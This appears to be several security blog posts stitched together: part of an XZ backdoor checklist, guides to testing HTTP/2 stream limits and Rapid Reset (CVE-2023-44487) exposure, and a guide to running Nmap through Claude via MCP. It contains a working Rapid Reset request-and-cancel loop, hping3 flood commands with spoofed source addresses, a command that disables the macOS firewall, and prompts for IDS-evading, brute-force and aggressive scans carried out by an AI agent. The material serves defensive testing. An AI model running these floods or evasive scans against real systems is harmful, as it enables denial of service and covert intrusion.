XZ Utils version 5.6.0 or 5.6.1 installed
SSH daemon (sshd) linking to liblzma library
Unusual SSH authentication timing (>800ms for auth probe)
High variance in SSH connection establishment times
Recent XZ Utils updates from February or March 2024
Debian or Ubuntu systems with systemd-enabled SSH
OpenSSH versions 9.6 or 9.7 on Debian-based distributions
Recommended Actions
Scan all SSH-accessible systems for timing anomalies
Verify XZ Utils versions across your infrastructure
Review SSH authentication logs for suspicious patterns
Implement continuous monitoring for behavioral anomalies
Establish performance baselines for critical services
Develop incident response procedures for supply chain compromises
Consider additional SSH hardening measures
Review and audit all open source dependencies in your environment
Testing Your Server's HTTP/2 Maximum Concurrent Streams
1. Introduction
Understanding and testing your server's maximum concurrent stream configuration is critical for both performance tuning and security hardening against HTTP/2 attacks. This guide provides tools and techniques to test the SETTINGS_MAX_CONCURRENT_STREAMS parameter on your web servers.
This article complements our previous guide on Testing Your Website for HTTP/2 Rapid Reset Vulnerabilities from macOS. While that article focuses on the CVE-2023-44487 Rapid Reset attack, this guide helps you verify that your server properly enforces stream limits, a critical defense mechanism.
2. Why Test Stream Limits?
The SETTINGS_MAX_CONCURRENT_STREAMS setting determines how many concurrent requests a client can multiplex over a single HTTP/2 connection. Testing this limit is important because:
Security validation: Confirms your server enforces reasonable stream limits
Configuration verification: Ensures your settings match security recommendations (typically 100-128 streams)
Performance tuning: Helps optimize the balance between throughput and resource consumption
Attack surface assessment: Identifies if servers accept dangerously high stream counts
3. Understanding HTTP/2 Stream Limits
When an HTTP/2 connection is established, the server sends a SETTINGS frame that includes, among other parameters, SETTINGS_MAX_CONCURRENT_STREAMS: the number of streams the client may keep open on that connection at once. A server that omits the setting effectively advertises no limit, which is exactly the misconfiguration the tester is designed to catch.
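As a minimal illustration of the first step such a tester performs, this sketch (using the Python h2 package; the host name is a placeholder) reads the advertised limit from the server's initial SETTINGS frame:

import socket
import ssl
import h2.connection
import h2.events
import h2.settings

HOST = "example.com"  # placeholder target

ctx = ssl.create_default_context()
ctx.set_alpn_protocols(["h2"])
sock = ctx.wrap_socket(socket.create_connection((HOST, 443)), server_hostname=HOST)

conn = h2.connection.H2Connection()
conn.initiate_connection()
sock.sendall(conn.data_to_send())

# Read until the server's SETTINGS frame arrives (usually in the first flight)
advertised = None
while advertised is None:
    for event in conn.receive_data(sock.recv(65535)):
        if isinstance(event, h2.events.RemoteSettingsChanged):
            changed = event.changed_settings.get(
                h2.settings.SettingCodes.MAX_CONCURRENT_STREAMS)
            advertised = changed.new_value if changed else "not specified"
print("Advertised max concurrent streams:", advertised)

Running the full tester against a well-configured server produces output like this: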
Testing HTTP/2 Stream Limits:
Target: example.com:443
Max streams to test: 200
Batch size: 10
============================================================
Server advertised limit: 128 concurrent streams
Opening batch of 10 streams (total: 10)...
Opening batch of 10 streams (total: 20)...
Opening batch of 10 streams (total: 130)...
WARNING: 5 stream(s) were reset by server
Stream limit enforcement detected
============================================================
STREAM LIMIT TEST RESULTS
============================================================
Server Configuration:
Advertised max streams: 128
Test Statistics:
Successful stream opens: 130
Failed stream opens: 0
Streams reset by server: 5
Actual max achieved: 125
Test duration: 3.45s
Enforcement:
Stream limit enforcement: DETECTED
============================================================
ASSESSMENT
============================================================
Advertised limit (128) is within recommended range
Server actively enforces stream limits
Stream limit protection is working correctly
============================================================
By contrast, a server with no enforced limits produces output like this:
Advertised max streams: Not specified
Successful stream opens: 200
Streams reset by server: 0
Actual max achieved: 200
Stream limit enforcement: NOT DETECTED
Analysis: The server neither advertises nor enforces limits. This is a high-risk configuration that requires immediate remediation.
# Step 1: Test stream limits
python3 http2_stream_limit_tester.py --host example.com
# Step 2: Test rapid reset with IP spoofing
sudo python3 http2rapidresettester_macos.py \
--host example.com \
--cidr 192.168.1.0/24 \
--packets 1000
# Step 3: Re-test stream limits to verify no degradation
python3 http2_stream_limit_tester.py --host example.com
11. Security Best Practices
11.1. Configuration Guidelines
Set explicit limits: Never rely on default values
Use conservative values: 100-128 streams is the recommended range
Monitor enforcement: Regularly verify that limits are actually being enforced
Document settings: Maintain records of your stream limit configuration
Test after changes: Always test after configuration modifications
11.2. Defense in Depth
Stream limits should be one layer in a comprehensive security strategy:
Stream limits: Prevent excessive concurrent streams per connection
Connection limits: Limit total connections per IP address
Request rate limiting: Throttle requests per second
Resource quotas: Set memory and CPU limits
WAF/DDoS protection: Use cloud-based or on-premise DDoS mitigation
11.3. Regular Testing Schedule
Establish a regular testing schedule:
Weekly: Automated basic stream limit tests
Monthly: Comprehensive security testing including Rapid Reset
After changes: Always test after configuration or infrastructure changes
Quarterly: Full security audit including penetration testing
12. Troubleshooting
12.1. Common Errors
Error: “SSL: CERTIFICATE_VERIFY_FAILED”
This occurs when testing against servers with self-signed certificates. For testing purposes only, you can modify the script to skip certificate verification (not recommended for production testing).
13. Testing Each Infrastructure Tier
If your site sits behind a CDN or load balancer, test each tier separately, since every hop can enforce its own stream limits:
# Test CDN edge
python3 http2_stream_limit_tester.py --host cdn.example.com
# Test load balancer directly
python3 http2_stream_limit_tester.py --host lb.example.com
# Test origin server
python3 http2_stream_limit_tester.py --host origin.example.com
14. Conclusion
Testing your HTTP/2 maximum concurrent streams configuration is essential for maintaining a secure and performant web infrastructure. This tool allows you to:
Verify that your server advertises appropriate stream limits
Confirm that advertised limits are actually enforced
Identify misconfigurations before they can be exploited
Tune performance while maintaining security
Regular testing, combined with proper configuration and monitoring, will help protect your infrastructure against HTTP/2-based attacks while maintaining optimal performance for legitimate users.
This guide and testing script are provided for educational and defensive security purposes only. Always obtain proper authorization before testing systems you do not own.
Testing Your Website for HTTP/2 Rapid Reset Vulnerabilities from macOS
In October 2023, a critical zero-day vulnerability in the HTTP/2 protocol was disclosed that affected virtually every HTTP/2-capable web server and proxy, after attacks exploiting it had been observed in the wild since August. Known as HTTP/2 Rapid Reset (CVE-2023-44487), this vulnerability enabled attackers to launch devastating Distributed Denial of Service (DDoS) attacks with minimal resources. Google reported mitigating the largest DDoS attack ever recorded at the time (398 million requests per second) leveraging this technique.
Understanding this vulnerability and knowing how to test your infrastructure against it is crucial for maintaining a secure and resilient web presence. This guide provides a flexible testing tool, designed specifically for macOS, that uses hping3 for packet crafting with CIDR-based source IP address spoofing.
What is HTTP/2 Rapid Reset?
The HTTP/2 Protocol Foundation
HTTP/2 introduced multiplexing, allowing multiple streams (requests/responses) to be sent concurrently over a single TCP connection. Each stream has a unique identifier and can be independently managed. To cancel a stream, HTTP/2 uses the RST_STREAM frame, which immediately terminates the stream and signals that no further processing is needed.
The Vulnerability Mechanism
The HTTP/2 Rapid Reset attack exploits the asymmetry between client cost and server cost:
Client cost: Sending a request followed immediately by a RST_STREAM frame is computationally trivial
Server cost: Processing the incoming request (parsing headers, routing, backend queries) consumes significant resources before the cancellation is received
An attacker can:
Open an HTTP/2 connection
Send thousands of requests with incrementing stream IDs
Immediately cancel each request with RST_STREAM frames
Repeat this cycle at extremely high rates
The server receives these requests and begins processing them. Even though the cancellation arrives milliseconds later, the server has already invested CPU, memory, and I/O resources. By sending millions of request cancel pairs per second, attackers can exhaust server resources with minimal bandwidth.
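The core of the attack loop is trivially small. Here is a sketch of the request/cancel cycle using the Python h2 package (for authorized testing only; the header values are placeholders):

import h2.connection
import h2.errors

conn = h2.connection.H2Connection()
conn.initiate_connection()

headers = [(":method", "GET"), (":path", "/"),
           (":scheme", "https"), (":authority", "example.com")]
for stream_id in range(1, 2001, 2):  # client-initiated stream IDs are odd
    conn.send_headers(stream_id, headers)  # cheap for the client...
    conn.reset_stream(stream_id, error_code=h2.errors.ErrorCodes.CANCEL)  # ...cancelled before the server finishes
payload = conn.data_to_send()  # bytes to write to the TLS socket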
Why It’s So Effective
Traditional rate limiting and DDoS mitigation techniques struggle against Rapid Reset attacks because:
Low bandwidth usage: The attack uses minimal data (mostly HTTP/2 frames with small headers)
Valid protocol behavior: RST_STREAM is a legitimate HTTP/2 mechanism
Connection reuse: Attackers multiplex thousands of streams over relatively few connections
Amplification: Each cheap client operation triggers expensive server side processing
How to Guard Against HTTP/2 Rapid Reset
1. Update Your Software Stack
Immediate Priority: Ensure all HTTP/2 capable components are patched:
Web Servers:
Nginx 1.25.2+ or 1.24.1+
Apache HTTP Server 2.4.58+
Caddy 2.7.4+
LiteSpeed 6.0.12+
Reverse Proxies and Load Balancers:
HAProxy 2.8.2+ or 2.6.15+
Envoy 1.27.0+
Traefik 2.10.5+
CDN and Cloud Services:
CloudFlare (auto patched August 2023)
AWS ALB/CloudFront (patched)
Azure Front Door (patched)
Google Cloud Load Balancer (patched)
Application Servers:
Tomcat 10.1.13+, 9.0.80+
Jetty 12.0.1+, 11.0.16+, 10.0.16+
Node.js 20.8.1+, 18.18.2+
2. Implement Stream Limits
Configure strict limits on HTTP/2 stream behavior:
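For reference, the relevant directives on two common servers look like this (values are the commonly recommended ones; check your version's documentation):

# nginx
http2_max_concurrent_streams 128;

# Apache httpd (mod_http2)
H2MaxSessionStreams 100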
As a last resort, you can disable HTTP/2 entirely and serve traffic over HTTP/1.1. Note: this forfeits HTTP/2's performance benefits but eliminates the vulnerability.
Testing Script for HTTP/2 Rapid Reset Vulnerabilities on macOS
Below is a parameterized Python script that tests your web servers using hping3 for packet crafting. This script is specifically optimized for macOS and can spoof source IP addresses from a CIDR block to simulate distributed attacks. Using hping3 ensures IP spoofing works consistently across different network environments.
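The full script is too long to reproduce here, but the packet-crafting primitive it wraps is a single hping3 invocation (target and spoofed address are placeholders):

sudo hping3 -S -p 443 -a 192.168.1.10 -c 1000 -i u1000 example.com
# -S: SYN flag; -a/--spoof: forged source address
# -c 1000: packet count; -i u1000: one packet every 1,000 microseconds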
# Temporarily disable firewall (not recommended for production)
sudo /usr/libexec/ApplicationFirewall/socketfilterfw --setglobalstate off
# Re-enable after testing
sudo /usr/libexec/ApplicationFirewall/socketfilterfw --setglobalstate on
# Connection states
netstat -an | grep :443 | awk '{print $6}' | sort | uniq -c
# Active connections count
netstat -an | grep ESTABLISHED | wc -l
# SYN_RECV connections
netstat -an | grep SYN_RECV | wc -l
# System resources
top -l 1 | head -10
Understanding IP Spoofing with hping3
How It Works
hping3 creates raw packets at the network layer, allowing you to specify arbitrary source IP addresses. This bypasses normal TCP/IP stack restrictions.
Network Requirements
For IP spoofing to work effectively:
Local networks: Works best on LANs you control
Direct routing: Requires direct layer 2 access
No NAT interference: NAT devices may rewrite source addresses
Router configuration: Some routers filter spoofed packets (BCP 38)
Testing Without Spoofing
If IP spoofing is not working in your environment, run the tester from your real source address instead, or try hping3's --rand-source option where egress filtering allows it. You lose the distributed-source simulation, but the server's RST_STREAM handling is still exercised.
Conclusion
The HTTP/2 Rapid Reset vulnerability represents a significant threat to web infrastructure, but with proper patching, configuration, and monitoring, you can effectively protect your systems. This macOS-optimized testing script, built on hping3, lets you validate your defenses in a controlled manner with reliable IP spoofing across different network environments.
Remember that security is an ongoing process. Regularly:
Update your web server and proxy software
Review and adjust HTTP/2 configuration limits
Monitor for unusual traffic patterns
Test your defenses against emerging threats
By staying vigilant and proactive, you can maintain a resilient web presence capable of withstanding sophisticated DDoS attacks.
This blog post and testing script are provided for educational and defensive security purposes only. Always obtain proper authorization before testing systems you do not own.
Using NMAP with Claude Desktop via the Model Context Protocol (MCP)
NMAP (Network Mapper) is one of the most powerful and versatile network scanning tools available to security professionals, system administrators, and ethical hackers. When combined with Claude through the Model Context Protocol (MCP), it becomes even more powerful, allowing you to leverage AI to intelligently analyze scan results, suggest scanning strategies, and interpret complex network data.
In this deep dive, we’ll explore how to set up NMAP with Claude Desktop using an MCP server, and demonstrate 20+ comprehensive vulnerability checks and reconnaissance techniques you can perform using natural language prompts.
Legal Disclaimer: Only scan systems and networks you own or have explicit written permission to test. Unauthorized scanning may be illegal in your jurisdiction.
Scan the top 1000 ports on example-target.com and detect the exact versions of services running on open ports. This will help identify outdated software.
What this does: Probes open ports to determine service/version info, crucial for finding known vulnerabilities.
Run an aggressive scan on example-target.com that includes OS detection, version detection, script scanning, and traceroute. This is comprehensive but noisy.
What this does: Combines multiple detection techniques for maximum information.
Analyze SSL/TLS configuration on example-target.com (port 443). Check for weak ciphers, certificate issues, and SSL vulnerabilities like Heartbleed and POODLE.
What this does: Comprehensive SSL/TLS security assessment.
I need a complete security assessment of webapp.example-target.com. Please:
1. First, discover all open ports and running services
2. Identify the web server software and version
3. Check for SSL/TLS vulnerabilities and certificate issues
4. Test for common web vulnerabilities (XSS, SQLi, CSRF)
5. Check security headers (CSP, HSTS, X-Frame-Options, etc.)
6. Enumerate web directories and interesting files
7. Test for backup file exposure (.bak, .old, .zip)
8. Check for sensitive information in robots.txt and sitemap.xml
9. Test HTTP methods for dangerous verbs (PUT, DELETE, TRACE)
10. Provide a prioritized summary of findings with remediation advice
Use timing template T3 (normal) to avoid overwhelming the target.
What Claude will do:
Claude will execute multiple NMAP scans in sequence, starting with discovery and progressively getting more detailed. Example commands it might run:
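For example (flags are standard Nmap; the exact sequence depends on the plan Claude proposes):

nmap -sV -T3 --top-ports 1000 webapp.example-target.com
nmap -p 443 -T3 --script ssl-enum-ciphers,ssl-heartbleed,ssl-poodle webapp.example-target.com
nmap -p 80,443 -T3 --script http-enum,http-methods,http-security-headers webapp.example-target.com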
Perform comprehensive network perimeter reconnaissance for company.example-target.com (IP range 198.51.100.0/24). I need to:
1. Discover all live hosts in the IP range
2. For each live host, identify:
- Operating system
- All open ports (full 65535 range)
- Service versions
- Potential vulnerabilities
3. Map the network topology and identify:
- Firewalls and filtering
- DMZ hosts vs internal hosts
- Critical infrastructure (DNS, mail, web servers)
4. Test for common network misconfigurations:
- Open DNS resolvers
- Open mail relays
- Unauthenticated database access
- Unencrypted management protocols (Telnet, FTP)
5. Provide a network map and executive summary
Use slow timing (T2) to minimize detection risk and avoid false positives.
# Phase 1: Host Discovery
nmap -sn -T2 198.51.100.0/24
# Phase 2: OS Detection on Live Hosts
nmap -O -T2 198.51.100.0/24
# Phase 3: Comprehensive Port Scan (may suggest splitting into chunks)
nmap -p- -T2 198.51.100.0/24
# Phase 4: Service Version Detection
nmap -sV -T2 198.51.100.0/24
# Phase 5: Specific Service Checks
nmap -p 53 --script dns-recursion 198.51.100.0/24
nmap -p 25 --script smtp-open-relay 198.51.100.0/24
nmap -p 3306,5432,27017 --script mysql-empty-password,pgsql-brute,mongodb-databases 198.51.100.0/24
nmap -p 23,21 198.51.100.0/24
# Phase 6: Vulnerability Scanning on Critical Hosts
nmap --script vuln -T2 [critical-hosts]
Learning Outcomes:
Large-scale network scanning strategies
How to handle and analyze results from multiple hosts
Network segmentation analysis
Risk assessment across an entire network perimeter
Understanding firewall and filtering detection
Deep Dive Exercise 3: Advanced Vulnerability Research – Zero-Day Hunting
Scenario: You’ve discovered a host running potentially vulnerable services and want to do deep reconnaissance to identify potential zero-day vulnerabilities or chained exploits.
I've found a server at secure-server.example-target.com that's running multiple services. I need advanced vulnerability research:
1. Aggressive version fingerprinting of all services
2. Check for version-specific CVEs in detected software
3. Look for unusual port combinations that might indicate custom applications
4. Test for default credentials on all identified services
5. Check for known backdoors in the detected software versions
6. Test for authentication bypass vulnerabilities
7. Look for information disclosure issues (version strings, debug info, error messages)
8. Test for timing attacks and race conditions
9. Analyze for possible exploit chains (e.g., LFI -> RCE)
10. Provide detailed analysis with CVSS scores and exploit availability
Run this aggressively (-T4) as we have permission for intensive testing.
Help me discover all subdomains of example-target.com and create a complete map of their infrastructure. For each subdomain found:
- Resolve its IP addresses
- Check if it's hosted on the same infrastructure
- Identify the services running
- Note any interesting or unusual findings
Also check for common subdomain patterns like api, dev, staging, admin, etc.
What this reveals: Shadow IT, forgotten dev servers, API endpoints, and the organization’s infrastructure footprint.
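Behind the scenes, Claude will typically lean on Nmap's DNS enumeration scripts, for example:

nmap --script dns-brute --script-args dns-brute.domain=example-target.com example-target.com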
I've found an API at api.example-target.com. Please:
1. Identify the API type (REST, GraphQL, SOAP)
2. Discover all available endpoints
3. Test authentication mechanisms
4. Check for rate limiting
5. Test for IDOR (Insecure Direct Object References)
6. Look for excessive data exposure
7. Test for injection vulnerabilities
8. Check API versioning and test old versions for vulnerabilities
9. Verify CORS configuration
10. Test for JWT vulnerabilities if applicable
Scan the network 192.168.1.0/24 for IoT and embedded devices such as:
- IP cameras
- Smart TVs
- Printers
- Network attached storage (NAS)
- Home automation systems
- Industrial control systems (ICS/SCADA if applicable)
Check each device for:
- Default credentials
- Outdated firmware
- Unencrypted communications
- Exposed management interfaces
Exercise 5.5: Checking for Known Vulnerabilities and Old Software
Perform a comprehensive audit of example-target.com focusing on outdated and vulnerable software:
1. Detect exact versions of all running services
2. For each service, check if it's end-of-life (EOL)
3. Identify known CVEs for each version detected
4. Prioritize findings by:
- CVSS score
- Exploit availability
- Exposure (internet-facing vs internal)
5. Check for:
- Outdated TLS/SSL versions
- Deprecated cryptographic algorithms
- Unpatched web frameworks
- Old CMS versions (WordPress, Joomla, Drupal)
- Legacy protocols (SSLv3, TLS 1.0, weak ciphers)
6. Generate a remediation roadmap with version upgrade recommendations
Scan example-target.com using techniques to evade firewalls and intrusion detection systems:
- Fragment packets
- Use decoy IP addresses
- Randomize scan order
- Use idle scan if possible
- Spoof MAC address (if on local network)
- Use source port 53 or 80 to bypass egress filtering
Help me create a custom NSE script that checks for a specific vulnerability in our custom application running on port 8080. The vulnerability is that the /debug endpoint returns sensitive configuration data without authentication.
Claude can help you write Lua scripts for NMAP’s scripting engine!
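A sketch of what such a script might look like (the endpoint, port, and strings come from the prompt above; treat it as a starting point rather than a finished scanner):

local http = require "http"
local shortport = require "shortport"

description = [[
Checks whether an unauthenticated /debug endpoint leaks configuration data.
]]
author = "Your Team"
license = "Same as Nmap -- see https://nmap.org/book/man-legal.html"
categories = {"vuln", "safe"}

portrule = shortport.port_or_service(8080, "http")

action = function(host, port)
  local response = http.get(host, port, "/debug")
  if response and response.status == 200 and response.body and #response.body > 0 then
    return ("/debug returned HTTP 200 with %d bytes and no authentication"):format(#response.body)
  end
  return nil
end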
Scan example-target.com and save results in all available formats (normal, XML, grepable, script kiddie). Then help me parse the XML output to extract just the critical and high severity findings for a report.
I've completed my NMAP scans and found 15 vulnerabilities. Here are the results: [paste scan output].
Please:
1. Categorize by severity (Critical, High, Medium, Low, Info)
2. Explain each vulnerability in business terms
3. Provide remediation steps for each
4. Suggest a remediation priority order
5. Draft an executive summary for management
6. Create technical remediation tickets for the engineering team
Claude excels at translating technical scan results into actionable business intelligence.
Part 8: Continuous Monitoring with NMAP and Claude
Set up regular scanning routines and use Claude to track changes:
Create a baseline scan of example-target.com and save it. Then help me set up a cron job (or scheduled task) to run weekly scans and alert me to any changes in:
- New open ports
- Changed service versions
- New hosts discovered
- Changes in vulnerabilities detected
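A minimal version of that loop, assuming Nmap's bundled ndiff utility and illustrative file paths:

# Run from cron weekly; compare against a stored baseline
nmap -sV -oX /var/scans/latest.xml example-target.com
ndiff /var/scans/baseline.xml /var/scans/latest.xml \
  || echo "Scan drift detected -- review /var/scans/latest.xml"
# ndiff exits non-zero when the scans differ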
Conclusion
Combining NMAP’s powerful network scanning capabilities with Claude’s AI-driven analysis creates a formidable security assessment toolkit. The Model Context Protocol bridges these tools seamlessly, allowing you to:
Express complex scanning requirements in natural language
Get intelligent interpretation of scan results
Receive contextual security advice
Automate repetitive reconnaissance tasks
Learn security concepts through interactive exploration
Key Takeaways:
Always get permission before scanning any network or system
Start with gentle scans and progressively get more aggressive
Use timing controls to avoid overwhelming targets or triggering alarms
Correlate multiple scans for a complete security picture
Leverage Claude’s knowledge to interpret results and suggest next steps
Document everything for compliance and knowledge sharing
Keep NMAP updated to benefit from the latest scripts and capabilities
The examples provided in this guide demonstrate just a fraction of what’s possible when combining NMAP with AI assistance. As you become more comfortable with this workflow, you’ll discover new ways to leverage Claude’s understanding to make your security assessments more efficient and comprehensive.
About the Author: This guide was created to help security professionals and system administrators leverage AI assistance for more effective network reconnaissance and vulnerability assessment.